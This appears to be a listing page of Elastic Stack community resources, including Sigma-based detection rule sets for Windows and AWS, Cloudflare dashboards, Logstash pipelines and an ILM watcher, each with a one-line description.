Sigma Sysmon detection rules
A collection of rules based on the Sigma detection rules for Windows Sysmon events based on Winlogbeat data.
Sigma Windows inbuilt detection rules
A collection of rules based on the Sigma rules for Windows (inbuilt folder) based on Winlogbeat data .
Sigma Windows Process Creation detection rules
A collection of rules based on the Sigma rules for Windows (process creation folder) based on Winlogbeat data .
Cloudflare Kibana dashboards
Cloudflare dashboards and ingest pipelines to visualize cloudflare logs
Logstash Pipeline for Talend ESB & MDM
A Logstash Pipeline to collect json logs from Talend ESB & MDM.
Data flow canvas
This canvas examples shows some possibilities of how to visualize data flows. Every flow can be activated / deactivated based on your Elasticsearch data.
Move to next ILM phase Watcher
This watcher job is moving specific indices based on e.g. disc usage into the next ILM phase.
Logstash REST to exec scripts
Make Logstash a REST endpoint that executes scripts or manually adds data in Elasticsearch.
Sigma AWS Cloudtrail Detection rules
A collection of rules based on the Sigma rules for AWS based on the Filebeat AWS module and Elastic agent integration.
The search results are evaluated by ElasticPress using Elasticsearch clusters from Elastic Cloud.